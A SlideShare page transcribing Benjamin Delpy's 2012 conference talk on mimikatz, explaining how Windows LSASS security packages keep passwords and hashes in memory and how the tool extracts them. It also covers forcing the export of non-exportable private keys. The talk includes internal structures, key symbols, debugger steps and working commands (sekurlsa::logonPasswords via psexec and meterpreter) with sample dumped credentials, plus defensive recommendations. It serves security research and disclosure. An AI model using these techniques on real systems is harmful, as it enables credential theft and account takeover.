Your SlideShare is downloading. ×
ASFWS 2012 - Mimikatz par Benjamin Delpy
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

ASFWS 2012 - Mimikatz par Benjamin Delpy

1,646

Published on

Présentation de l’outil mimikatz et des techniques utilisées pour récupérer des données d’authentifications Windows (mots de passe, hashes, certificats, …) …

Présentation de l’outil mimikatz et des techniques utilisées pour récupérer des données d’authentifications Windows (mots de passe, hashes, certificats, …)
– Faiblesse des gestionnaires de sécurités TsPkg, WDigest, LiveSSP, Kerberos, MSV1_0, …
– Secrets d’authentification Windows
– CryptoAPI et CNG

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,646
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
20
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. mimikatz Benjamin DELPY `gentilkiwi`focus on sekurlsa/pass-the-pass and crypto patches
  • 2. Who ? Why ? Benjamin DELPY `gentilkiwi` – French – 26y – Kiwi addict – Lazy programmer Started to code mimikatz to : – explain security concepts ; – improve my knowledge ; – prove to Microsoft that sometimes they must change old habits. Why all in French ? – because I’m  – It limits script kiddies usage – Hack with class07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 2
  • 3. mimikatz working On XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8 – x86 & x64 – 2000 support dropped with mimikatz 1.0 Everywhere ; it’s statically compiled Two modes – direct action (local commands) – process or driver communication m KeyIso m SamSS « Isolation de clé CNG » « Gestionnaire de comptes de sécurité » i LSASS.EXE i LSASS.EXE m i m i  VirtualAllocEx, Direct action : k crypto::patchcng k WriteProcessMemory, a a t t  CreateRemoteThread... EventLog sekurlsa.dll z z « Journal d’événements Windows » . SVCHOST.EXE . Open a pipe e e x x Write a welcome message Direct action : e e Wait commands… and return results divers::eventdrop07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 3
  • 4. mimikatz architecture of sekurlsa & crypto mod_mimikatz_standard mod_parseur mod_mimikatz_winmine mod_text mod_mimikatz_divers mod_memory mod_cryptoapi m mod_mimikatz_nogpo mod_secacl mimikatz.sys i m mod_mimikatz_impersonate mod_mimikatz_crypto mod_crypto i mod_mimikatz_inject mod_pipe kappfree.dll k mod_mimikatz_samdump mod_cryptoacng mod_inject a mod_mimikatz_handle mod_hive kelloworld.dll t mod_mimikatz_privilege mod_patch sam z msv_1_0 . mod_mimikatz_system mod_privilege tspkg klock.dll secrets e mod_mimikatz_service mod_system msv_1_0 x mod_mimikatz_sekurlsa wdigest mod_service tspkg sekurlsa.dll e mod_mimikatz_process livessp mod_process wdigest kerberos mod_mimikatz_thread mod_thread livessp mod_mimikatz_terminalserver mod_ts kerberos07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 4
  • 5. mimikatz :: sekurlsa mod_mimikatz_sekurlsa what is it ? A module replacement for my previous favorite library ! A local module that can read data from the SamSS Service (well known LSASS process) What sekurlsa module can dump : – MSV1_0 hashes – TsPkg passwords – Wdigest passwords – LiveSSP passwords – Kerberos passwords (!) – …?07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 5
  • 6. mimikatz :: sekurlsa how LSA works ( PLAYSKOOL level) Authentication WinLogon LsaSS msv1_0 SAM user:domain:password kerberos Authentication Packages msv1_0 Challenge Response tspkg wdigest livessp kerberos07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 6
  • 7. mimikatz :: sekurlsa how LSA works ( PLAYSKOOL level) Authentication packages : – take user’s credentials from the logon – make their own stuff – keep enough data in memory to compute responses of challenges (Single Sign On) If we can get data, and inject it in another session of LSASS, we avoid authentication part This is the principle of « Pass-the-hash » – In fact, of « Pass-the-x »07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 7
  • 8. mimikatz :: sekurlsa history of « pass-the-* » 1/2 Pass-the-hash – 1997 - Unix modified SAMBA client for Hashes usage ; Paul Ashton (EIGEN) – 2000 - Private version of a Windows « LSA Logon Session Editor » ; Hernan Ochoa (CoreSecurity) – 2007 - TechEd @ Microsoft ; Marc Murray (TrueSec) present msvctl, and provide some downloads of it  – 2007 - « Pass the hash toolkit » published ; Hernan Ochoa (CoreSecurity) – 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself but in French; so not famous ;)) 2007 was the year of pass the hash ! Pass-the-ticket – 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket support; Hernan Ochoa (Ampliasecurity)07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 8
  • 9. mimikatz :: sekurlsa history of « pass-the-* » 2/2 Pass-the-pass – 05/2011 – mimikatz 1.0 dumps first clear text passwords from TsPkg provider (but limited to NT 6 and some XP SP3) • http://blog.gentilkiwi.com/securite/pass-the-pass – 05/2011 – return of mimikatz ; it dumps clear text passwords from WDigest provider (unlimited this time ;)) • http://blog.gentilkiwi.com/securite/re-pass-the-pass – 05/2011 – Some organizations opened cases to Microsoft about it… …Lots of time… – begin of 2012 - Lots of blogs (and Kevin Mitnick ;)) say few words about mimikatz – 03/2012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extract… • http://seclists.org/pen-test/2012/Mar/7 – 03/2012 – mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory • http://blog.gentilkiwi.com/securite/rere-pass-the-pass – 03/2012 – yeah, once again…, more curious but Kerberos keeps passwords in memory • http://blog.gentilkiwi.com/securite/rerere-pass-the-pass – 08/2012 – sekurlsa module without injection at all ! (ultra safe) • http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 9
  • 10. mimikatz :: sekurlsa :: tspkg because sometimes hash is not enough…07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 10
  • 11. mimikatz :: sekurlsa :: tspkg what is it ? Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop users’s experience – http://technet.microsoft.com/library/cc772108.aspx Rely on CredSSP with Credentials Delegation (!= Account delegation) – Specs : http://download.microsoft.com/download/9/5/e/95ef66af- 9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf First impression : it seems cool  – User does not have to type its password – Password is not in RDP file – Password is not in user secrets07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 11
  • 12. mimikatz :: sekurlsa :: tspkg questions ? KB says that for it works, we must enable « Default credentials » delegation – “Default credentials : The credentials obtained when the user first logs on to Windows” - https://msdn.microsoft.com/library/bb204773.aspx • What ? Our User/Domain/{Password | Hash | Ticket} ? It seems … – In all cases, system seems to be vulnerable to pass-the-*… In what form ? Our specs : [MS-CSSP] – 2.2.1.2.1 TSPasswordCreds • The TSPasswordCreds structure contains the users password credentials that are delegated to the server. (or PIN) TSPasswordCreds ::= SEQUENCE { domainName [0] OCTET STRING, userName [1] OCTET STRING, password [2] OCTET STRING } – Challenge / response for authentication ? • Serveur : YES (TLS / Kerberos) • Client : NO ; *password* is sent to server… So password resides somewhere in memory ?07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 12
  • 13. mimikatz :: sekurlsa :: tspkg symbols & theory Let’s explore some symbols ! kd> x tspkg!*clear* 75016d1c tspkg!TSObtainClearCreds = <no type information> kd> x tspkg!*password* 75011b68 tspkg!TSDuplicatePassword = <no type information> 75011cd4 tspkg!TSHidePassword = <no type information> 750195ee tspkg!TSRevealPassword = <no type information> 75012fbd tspkg!TSUpdateCredentialsPassword = <no type information> kd> x tspkg!*locate* 7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information> – sounds cool… (thanks Microsoft) Let’s imagine a scenario – Enumerate all sessions to obtain : • Username • Domain • LUID – Call tspkg!TSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain : • TS_CREDENTIAL – Call tspkg!TSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for : • TS_PRIMARY_CREDENTIAL with clear text credentials…07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 13
  • 14. mimikatz :: sekurlsa :: tspkg workflow LsaEnumerateLogonSessions typedef struct _KIWI_TS_CREDENTIAL { #ifdef _M_X64 BYTE unk0[108]; #elif defined _M_IX86 BYTE unk0[64]; for each LUID #endif LUID LocallyUniqueIdentifier; PVOID unk1; PVOID unk2; tspkg!TSGlobal KIWI_TS_CREDEN PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary; TIAL } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL; CredTable typedef struct _KIWI_TS_PRIMARY_CREDENTIAL { PVOID unk0; LSA_UNICODE_STRING Domaine; RtlLookupElementGenericTabl LSA_UNICODE_STRING UserName; eAvl LSA_UNICODE_STRING Password; } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL; KIWI_TS_CREDEN TIAL KIWI_TS_PRIMAR Y_CREDENTIAL LsaUnprotectMemory password in clear !07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 14
  • 15. mimikatz :: sekurlsa :: tspkg demo time ! sekurlsa::tspkg07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 15
  • 16. mimikatz :: sekurlsa :: wdigest because clear text password over http/https is not cool07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 16
  • 17. mimikatz :: sekurlsa :: wdigest what is it ? “Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser. It applies a hash function to a password before sending it over the network […]” Wikipedia : http://en.wikipedia.org/wiki/Digest_access_authentication “Common Digest Authentication Scenarios : – Authenticated client access to a Web site – Authenticated client access using SASL – Authenticated client access with integrity protection to a directory service using LDAP” Microsoft : http://technet.microsoft.com/library/cc778868.aspx Again, it seems cool  – No password over the network, just hashes – No reversible password in Active Directory ; hashes for each realm • Only with Advanced Digest authentication07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 17
  • 18. mimikatz :: sekurlsa :: wdigest what is it ? We speak about hashes, but what hashes ? H = MD5(HA1:nonce:[…]:HA2) • HA1 = MD5(username:realm:password) • HA2 = MD5(method:digestURI:[…]) Even after login, HA1 may change… realm is from server side and cannot be determined before Windows logon WDigest provider must have elements to compute responses for different servers : – Username – Realm (from server) – Password07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 18
  • 19. mimikatz :: sekurlsa :: wdigest theory This time, we know : – that WDigest keeps password in memory « by protocol » for HA1 digest – that LSASS love to unprotect password with LsaUnprotectMemory (so protect with LsaProtectMemory) LsaUnprotectMemory – At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE – Let’s perform a research in WDigest : .text:7409D151 _DigestCalcHA1@8 call dword ptr [eax+0B4h] – Hypothesis seems verified  LsaProtectMemory – At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE – Let’s perform a research in WDigest : .text:74096C69 _SpAcceptCredentials@16 call dword ptr [eax+0B0h] – SpAcceptCredentials takes clear password in args • Protect it with LsaProtectMemory • Update or insert data in double linked list : wdigest!l_LogSessList07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 19
  • 20. mimikatz :: sekurlsa :: wdigest workflow typedef struct _KIWI_WDIGEST_LIST_ENTRY { LsaEnumerateLogonSessions struct _KIWI_WDIGEST_LIST_ENTRY *Flink; struct _KIWI_WDIGEST_LIST_ENTRY *Blink; DWORD UsageCount; struct _KIWI_WDIGEST_LIST_ENTRY *This; for each LUID LUID LocallyUniqueIdentifier; […] LSA_UNICODE_STRING UserName; LSA_UNICODE_STRING Domaine; wdigest!l_LogS LSA_UNICODE_STRING Password; […] essList } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY; search linked list for LUID KIWI_WDIGEST_L IST_ENTRY LsaUnprotectMemory password in clear !07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 20
  • 21. mimikatz :: sekurlsa :: wdigest demo time ! sekurlsa::wdigest07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 21
  • 22. mimikatz :: sekurlsa :: livessp because Microsoft was too good in closed networks07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 22
  • 23. mimikatz :: sekurlsa :: livessp how Actually I’ve only used logical (empirical) approach to search passwords… : – Protocol reading – Symbols searching ~ Boring ~… be more brutal this time : make a WinDBG trap ! 0: kd> !process 0 0 lsass.exe PROCESS 83569040 SessionId: 0 Cid: 0224 Peb: 7f43f000 ParentCid: 01b4 DirBase: 5df58100 ObjectTable: 80ce4740 HandleCount: <Data Not Accessible> Image: lsass.exe 0: kd> .process /i 83569040 You need to continue execution (press g <enter>) for the context to be switched. When the debugger breaks in again, you will be in the new process context. 0: kd> g Break instruction exception - code 80000003 (first chance) nt!RtlpBreakWithStatusInstruction: 814b39d0 cc int 3 0: kd> .reload /user Loading User Symbols ............................................................ 0: kd> bp /p @$proc lsasrv!LsaProtectMemory "kc 5 ; g" 0: kd> g07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 23
  • 24. mimikatz :: sekurlsa :: livessp how Let’s login with a Live account on Windows 8 ! lsasrv!LsaProtectMemory livessp!LiveMakeSupplementalCred livessp!LiveMakeSecPkgCredentials Our LiveSSP provider livessp!LsaApLogonUserEx2 livessp!SpiLogonUserEx2 lsasrv!LsaProtectMemory msv1_0!NlpAddPrimaryCredential Yeah, Pass the Hash capability with Live msv1_0!SspAcceptCredentials msv1_0!SpAcceptCredentials account too… lsasrv!LsaProtectMemory tspkg!TSHidePassword Live user can logon through RDP via SSO tspkg!SpAcceptCredentials 1: kd> uf /c livessp!LsaApLogonUserEx2 livessp!LsaApLogonUserEx2 (74781536) [...] livessp!LsaApLogonUserEx2+0x560 (74781a96): call to livessp!LiveCreateLogonSession (74784867) After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 24
  • 25. mimikatz :: sekurlsa :: livessp workflow typedef struct _KIWI_LIVESSP_LIST_ENTRY { LsaEnumerateLogonSessions struct _KIWI_LIVESSP_LIST_ENTRY *Flink; struct _KIWI_LIVESSP_LIST_ENTRY *Blink; PVOID unk0; PVOID unk1; PVOID unk2; for each LUID PVOID unk3; DWORD unk4; DWORD unk5; PVOID unk6; livessp!LiveGloba LUID LocallyUniqueIdentifier; lLogonSessionList LSA_UNICODE_STRING UserName; PVOID unk7; PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds; } KIWI_LIVESSP_LIST_ENTRY, search linked list for LUID *PKIWI_LIVESSP_LIST_ENTRY; KIWI_LIVESSP_LIS T_ENTRY typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL { KIWI_LIVESSP_PRI DWORD isSupp; MARY_CREDENTIAL DWORD unk0; LSA_UNICODE_STRING UserName; LSA_UNICODE_STRING Domaine; LSA_UNICODE_STRING Password; LsaUnprotectMemory } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL; password in clear !07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 25
  • 26. mimikatz :: sekurlsa Even if we already have tools for normal accounts, are you not curious to test one with this trap ?* * Me, yes07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 26
  • 27. mimikatz :: sekurlsa :: kerberos Let’s login normal account lsasrv!LsaProtectMemory kerberos!KerbHideKey kerberos!KerbCreatePrimaryCredentials kerberos!KerbCreateLogonSession Kerberos, ticket part ? Maybe ;) kerberos!SpAcceptCredentials lsasrv!LsaProtectMemory kerberos!KerbHidePassword kerberos!KerbCreateLogonSession Kerberos part for password ?????? kerberos!SpAcceptCredentials lsasrv!LsaProtectMemory msv1_0!NlpAddPrimaryCredential msv1_0!SspAcceptCredentials msv1_0!SpAcceptCredentials lsasrv!LsaProtectMemory wdigest!SpAcceptCredentials lsasrv!LsaProtectMemory tspkg!TSHidePassword tspkg!SpAcceptCredentials After credentials protection, KerbCreateLogonSession calls : – NT6 ; KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable – NT5 ; KerbInsertLogonSession to insert data in KerbLogonSessionList07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 27
  • 28. mimikatz :: sekurlsa :: kerberos (nt6) workflow LsaEnumerateLogonSessions for each LUID typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL { DWORD unk0; PVOID unk1; Kerberos!KerbG PVOID unk2; KIWI_KERBEROS_PR lobalLogonSess PVOID unk3; IMARY_CREDENTIAL ionTable #ifdef _M_X64 BYTE unk4[32]; #elif defined _M_IX86 BYTE unk4[20]; RtlLookupElementGenericTabl #endif LUID LocallyUniqueIdentifier; eAvl #ifdef _M_X64 BYTE unk5[44]; #elif defined _M_IX86 BYTE unk5[36]; #endif KIWI_KERBEROS_PR LSA_UNICODE_STRING UserName; IMARY_CREDENTIAL LSA_UNICODE_STRING Domaine; LSA_UNICODE_STRING Password; } KIWI_KERBEROS_PRIMARY_CREDENTIAL, LsaUnprotectMemory *PKIWI_KERBEROS_PRIMARY_CREDENTIAL; password in clear !07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 28
  • 29. mimikatz :: sekurlsa :: kerberos (nt5) workflow typedef struct _KIWI_KERBEROS_LOGON_SESSION { LsaEnumerateLogonSessions struct _KIWI_KERBEROS_LOGON_SESSION *Flink; struct _KIWI_KERBEROS_LOGON_SESSION *Blink; DWORD UsageCount; PVOID unk0; PVOID unk1; for each LUID PVOID unk2; DWORD unk3; DWORD unk4; PVOID unk5; kerberos!KerbLog PVOID unk6; onSessionList PVOID unk7; LUID LocallyUniqueIdentifier; #ifdef _M_IX86 DWORD unk8; search linked list for LUID #endif DWORD unk9; DWORD unk10; PVOID unk11; DWORD unk12; DWORD unk13; KIWI_LIVESSP_PRI PVOID unk14; MARY_CREDENTIAL PVOID unk15; PVOID unk16; […] LSA_UNICODE_STRING UserName; LSA_UNICODE_STRING Domaine; LsaUnprotectMemory LSA_UNICODE_STRING Password; } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION; password in clear !07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 29
  • 30. mimikatz :: sekurlsa demo time ! Final sekurlsa demo sekurlsa::logonPasswords full07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 30
  • 31. mimikatz :: sekurlsa :: kerberos “hu ?” Ok It works…* But why ? * Not at all logon on NT5 (can need an unlock) From my understanding of Microsoft explanations – no need of passwords for the Kerberos protocol… – all is based on the hash (not very sexy too) Microsoft’s implementation of Kerberos is full of logical… – For password auth : • password hash for shared secret, but keeping password in memory – For full smartcard auth : • No password on client • No hash on client ? – NTLM hash on client… – KDC sent it back as a gift07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 31
  • 32. mimikatz :: sekurlsa All passwords in memory are encrypted, but in a reversible way to be used We used LsaUnprotecMemory, in the LSASS context, to decrypt them LsaUnprotectMemory – This function rely on LsaEncryptMemory from lsasrv.dll For that, we previously inject a DLL (sekurlsa.dll) in the LSASS process to take benefits of its keys when we called it Can it be fun to decrypt outside the process ? – Yes, it is… no more injection, just reading memory of LSASS process… mimikatz can use lsasrv.dll too and “imports” LSASS initialized keys  – When we call LsaEncryptMemory in mimikatz, with all keys imported from LSASS, we have the same comportments than when we are in LSASS !07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 32
  • 33. mimikatz :: sekurlsa LsaEncryptMemory NT5 Depending on the size of the secret, LsaEncryptMemory use : – RC4 DWORD ; 256 g_cbRandomKey l l s s g_pRandomKey @BYTE[g_cbRandomKey] a a s s r BYTE[g_cbRandomKey] m s i l v m s copy… – DESx i a @BYTE[144] k s g_pDESXKey l a r l v s s BYTE[144] t a z a s s r s v g_Feedback BYTE[8]07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 33
  • 34. mimikatz :: sekurlsa LsaEncryptMemory NT6 Depending on the size of the secret, LsaEncryptMemory use : InitializationVector BYTE[16] – 3DES l l s typedef struct _KIWI_BCRYPT_KEY_DATA { s DWORD size; a a h3DesKey DWORD tag; s m DWORD type; s DWORD unk0; r i DWORD unk1; s l DWORD unk2; v m s DWORD unk3; PVOID unk4; copy… i a BYTE data; /* etc... */ – AES k s } KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA; a r l typedef struct _KIWI_BCRYPT_KEY { l t v s DWORD size; s z DWORD type; a PVOID unk0; a hAesKey PKIWI_BCRYPT_KEY_DATA cle; s PVOID unk1; s r } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY; s v07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 34
  • 35. mimikatz :: sekurlsa memo Security Packages Package Symbols Type tspkg tspkg!TSGlobalCredTable RTL_AVL_TABLE wdigest wdigest!l_LogSessList LIST_ENTRY livessp livessp!LiveGlobalLogonSessionList LIST_ENTRY kerberos (nt5) kerberos!KerbLogonSessionList LIST_ENTRY kerberos (nt6) kerberos!KerbGlobalLogonSessionTable RTL_AVL_TABLE msv1_0 lsasrv!LogonSessionList LIST_ENTRY lsasrv!LogonSessionListCount ULONG Protection Keys Key NT 5 Symbols Key NT 6 Symbols RC4 lsasrv!g_cbRandomKey lsasrv!InitializationVector lsasrv!g_pRandomKey 3DES lsasrv!h3DesKey DESx lsasrv!g_pDESXKey AES lsasrv!hAesKey lsasrv!g_Feedback07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 35
  • 36. mimikatz :: sekurlsa memo Some commands :  mimikatz privilege::debug "sekurlsa::logonPasswords full" exit  psexec windows -s -c c:mimikatzWin32mimikatz.exe "sekurlsa::logonPasswords full" exit  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug 2 2012 01:32:28) */ // http://blog.gentilkiwi.com/mimikatz mimikatz # privilege::debug Demande dACTIVATION du privilège : SeDebugPrivilege : OK mimikatz # sekurlsa::logonPasswords full Authentification Id : 0;234870 Package dauthentification : NTLM Utilisateur principal : Gentil Kiwi Domaine dauthentification : vm-w8-rp-x msv1_0 : * Utilisateur : Gentil Kiwi * Domaine : vm-w8-rp-x * Hash LM : d0e9aee149655a6075e4540af1f22d3b * Hash NTLM : cc36cf7a8514893efccd332446158b1a kerberos : * Utilisateur : Gentil Kiwi * Domaine : vm-w8-rp-x * Mot de passe : waza1234/ wdigest : * Utilisateur : Gentil Kiwi * Domaine : vm-w8-rp-x * Mot de passe : waza1234/ tspkg : * Utilisateur : Gentil Kiwi * Domaine : vm-w8-rp-x * Mot de passe : waza1234/ livessp : n.t. (LUID KO)07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 36
  • 37. mimikatz :: sekurlsa what we can do ? Basics – No physical access to computer (first step to pass the hash, then pass the pass) – No admin rights / system rights / debug privileges (…) – Disable local admin accounts – Strong passwords (haha, it was a joke ; so useless !!!) – For privileged account, network login instead of interactive (when possible) – Audit ; pass the hash keeps traces and can lock accounts – No admin rights / system rights / debug privileges, even VIP – Use separated network (or forest) for privileged tasks More in depth – Force strong authentication (SmartCard & Token) : $ / € – Short validity for Kerberos tickets – No delegation – Disable NTLM (available with NT6) – No exotic : • biometrics (it keeps password somewhere and push it to Windows) • single sign on – Stop shared secrets for authentication : push Public / Private stuff (like keys ;)) – Let opportunities to stop retro compatibility – Disable faulty providers ? • Is it supported by Microsoft ? • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0 ?07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 37
  • 38. mimikatz :: crypto mod_mimikatz_crypto what is it ? A little module that I wrote to : – play with Windows Cryptographic API / CNG and RSA keys – automate export of certificates/keys • Even those which are “not” exportable  What crypto module can do : – List • Providers • Stores • Certificates • Keys – Export • Certificates – public in DER format – with private keys in PFX format • Private keys in PVK format – it’s cool, OpenSSL can deal with it too  – Patch • CryptoAPI in mimikatz context • CNG in LSASS context (again !)07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 38
  • 39. mimikatz :: crypto how it’s protected Private keys are DPAPI protected – You cannot reuse private key files on another computer • At least without the master keys and/or password of users Computer/User can load their own keys because they have enough secrets to do it (ex : session opened) – Yes, a computer/server open a “session” Export/Usage can be limited by : – Password Constraint for most user – Popup Unavailable for computer keys – Export/Archive flag no present certutil -importpfx mycert.p12 NoExport certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 39
  • 40. mimikatz :: crypto :: capi how it works “Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardware.” – http://technet.microsoft.com/library/cc962093.aspx Processes (mimikatz, IIS, Active Directory , Internet Explorer, yourappshere…) load some DLL to deal with different cryptographic stuff : CSP (keys), smartcard reader, … – cryptdll.dll, rsaenh.dll, … Process deal with cryptographic keys by this API…07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 40
  • 41. mimikatz :: crypto :: capi how it’s exported ( PLAYSKOOL level) Process CryptoAPI and RSA CSP Exportable yes Load Private Key DPAPI Decode ? no Ask to export Key NTE_BAD_KEY_STATE Exported Key07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 41
  • 42. mimikatz :: crypto :: patchcapi because I own my process When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey This function do all the work to prepare the export, and check if the key is exportable Exportable ? ================ Certificat 0 ================ Numéro de série : 112169417a1c3ef46a301f99385f50680fa0 Émetteur: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE Objet: CN=Benjamin Delpy, C=FR Il ne sagit pas dun certificat racine Hach. cert. (sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de clé = {470ADFBA-8718-4014-B05E-B30776B75A03} Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0 La clé privée NE PEUT PAS être exportée Succès du test de cryptage CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813) CertUtil: Clé non valide pour lutilisation dans létat spécifié. mimikatz # crypto::exportCertificates Emplacement : CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Clé : {470ADFBA-8718-4014-B05E-B30776B75A03} Provider : Microsoft Enhanced Cryptographic Provider v1.0 Type : AT_KEYEXCHANGE Exportabilité : NON Taille clé : 2048 Export privé dans 